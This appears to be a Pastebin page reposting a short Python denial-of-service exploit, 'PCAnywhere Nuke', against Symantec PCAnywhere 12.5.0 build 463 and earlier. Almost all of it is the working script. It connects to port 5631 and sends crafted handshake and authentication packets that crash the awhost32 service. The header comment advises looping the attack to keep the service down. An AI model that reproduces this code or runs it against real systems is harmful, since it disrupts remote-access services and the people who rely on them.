Advertisement
moften

Exploit Symantec PCAnywhere Nuke

Feb 22nd, 2012
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.94 KB | None | 0 0
  1.  #!/usr/bin/python
  2. '''
  3. Exploit Title: PCAnywhere Nuke
  4. Date: 2/16/12
  5. Author: Johnathan Norman spoofy <at> exploitscience.org or @spoofyroot
  6. Version: PCAnyWhere (12.5.0 build 463) and below
  7. Tested on: Windows
  8. Description: The following code will crash the awhost32 service. It'll be respawned
  9. so if you want to be a real pain you'll need to loop this.. my inital impressions
  10. are that controlling execuction will be a pain.
  11. '''
  12. import sys
  13. import socket
  14. import argparse
  15. if len(sys.argv) != 2:
  16. print "[+] Usage: ./pcNuke.py <HOST>"
  17. sys.exit(1)
  18. HOST = sys.argv[1]
  19. PORT = 5631
  20. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  21. s.connect((HOST, PORT))
  22. # HELLO!
  23. s.send("\x00\x00\x00\x00")
  24. buf = s.recv(1024)
  25. # ACK!
  26. s.send("\x6f\x06\xfe")
  27. buf = s.recv(1024)
  28. # Auth capability part 1
  29. s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
  30. # Auth capability part 2
  31. s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement